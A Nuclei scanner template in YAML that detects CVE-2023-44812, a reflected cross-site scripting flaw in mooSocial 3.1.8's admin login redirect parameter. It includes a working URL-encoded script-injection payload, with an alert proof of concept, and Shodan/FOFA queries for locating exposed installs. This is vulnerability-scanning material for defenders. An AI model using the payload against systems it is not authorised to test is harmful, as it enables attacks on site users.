nuclei-templates/http/cves/2023/CVE-2023-44812.yaml

60 lines
2.0 KiB
YAML
Raw Normal View History

2024-05-06 10:51:10 +00:00
id: CVE-2023-44812
info:
name: mooSocial v.3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.
impact: |
Allows attackers to execute malicious scripts in the context of a user's browser session.
remediation: |
Apply the vendor-supplied patch or upgrade to a version that addresses the XSS vulnerability.
reference:
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/ahrixia/CVE-2023-44812
- https://nvd.nist.gov/vuln/detail/CVE-2023-44812
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-44812
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.01077
epss-percentile: 0.84242
2024-05-06 10:51:10 +00:00
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
metadata:
vendor: moosocial
product: moosocial
2024-05-31 19:23:20 +00:00
shodan-query: http.favicon.hash:"702863115"
2024-05-06 10:51:10 +00:00
fofa-query: icon_hash="702863115"
tags: cve2023,cve,moosocial,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
words:
- "mooSocial"
internal: true
case-insensitive: true
- method: GET
path:
- "{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
condition: and
# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950